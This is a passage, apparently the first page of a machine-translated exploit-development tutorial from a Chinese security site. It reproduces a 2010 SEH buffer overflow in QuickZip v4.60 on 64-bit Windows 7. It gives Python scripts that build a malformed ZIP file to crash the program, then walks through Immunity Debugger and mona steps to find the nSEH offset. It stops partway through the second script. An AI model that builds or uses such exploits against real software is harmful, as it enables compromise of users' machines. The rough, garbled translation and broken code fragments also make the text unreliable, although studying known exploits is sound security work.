QuickZip V4. 60 buffer overflow vulnerability details-vulnerability warning-the black bar safety net

ID MYHACK58:62201786029
Type myhack58
Reporter 佚名
Modified 2017-05-11T00:00:00


This article will provide the reader a detailed description QuickZip v4. 60 buffer overflow vulnerability knowledge. Due to the vulnerabilities in 2010 appeared, so it's designed only for 32-bit Windows XP. So, I decided to try it in 64-bit Windows 7 reproduce the vulnerability, it would be a fun challenge to! PoC To this end, I From exploit-db, grab the QuickZip v4. 60 Windows XP vulnerabilities and will use it to create a simple PoC to trigger the crash.

!/ usr/bin/python

header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00") header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00" "\x24\x00\x00\x00\x00\x00\x00\x00") header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00") print "[+] Building PoC.." max_size = 4064 payload = "A" * max_size payload += ". txt" print "[+] Length = " + str(len(payload)) exploit = header_1 + payload + header_2 + payload + header_3 mefile = open('cst.zip','w'); mefile. write(exploit); mefile. close() print "[+] Exploit complete!" The above code creates a compressed file, which contains only one named 4064A of the file, its extension“. txt”. Header_1 and header_2, and header_3 is a ZIP file structure of the desired title. I won't detail, but here you can read more. If you are in QuickZip, open the newly created ZIP file and try to extract the contents or simply double-click the file name, then QuickZip will collapse. Know the crash details Okay, let's run the PoC and see what happened. Using the above Python script to create a ZIP file using QuickZip open it, start ImmunityDebugger, attached to the QuickZip process, and in QuickZip, double-click the file name to trigger the crash. Note: we will continue to repeat this process! ! Well, crash on schedule. In addition, there occurs an exception, the bottom of the screen you can see“Access violation when writing to [00190000] in”. This means that we attempt to write an invalid memory address, which triggered an exception. Below, we examine the SEH chain. ! Well, it seems we can control the nSEH pointer is! In the following, we try to calculate the offset. Offset As always, I'm with mona(https://github.com/corelan/mona to complete a lot of work. First, we generate a 4064 a unique character in the stencil, and put it in the PoC exploit code payload:

! mona pc 4064 Again to trigger the crash, see what happens. ! Uh, the crash looks a bit different. The problem here is the LEAVE instruction to try from the stack to jump back to 0EEDFADE address, but here is the program invalid memory address. In addition, it seems that we are unable to control the SEH. ! However, please note that we are actually in the kernel module, look at the Immunity of the window name:“CPU - main thread, module KERNELBA” in. Use SHIFT + F9 will execute the right to return to the program to see whether to trigger another exception, but is in QuickZip module. ! ! Awesome, looks like a success! Use the following command to allow mona to calculate all the offset:

it! mona findmsp ! Here, we are most interested in the offset is the nSEH field: offset 292 is. Let's use the offset information to update the PoC and try again to trigger the crash.

!/ usr/bin/python

header_1 = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00") header_2 = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00" "\x24\x00\x00\x00\x00\x00\x00\x00") header_3 = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" "\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00") print "[+] Building PoC.." max_size = 4064 nseh_offset = 292 payload = "A" * nseh_offset # padding for nSEH payload += "BBBB" # nSEH

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] next